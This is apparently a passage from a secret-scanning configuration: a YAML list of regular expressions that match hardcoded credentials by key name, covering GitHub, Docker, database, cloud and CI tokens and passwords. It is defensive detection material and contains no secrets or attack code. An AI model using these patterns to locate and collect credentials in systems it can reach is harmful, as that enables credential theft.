- - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?consumerkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bintraykey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
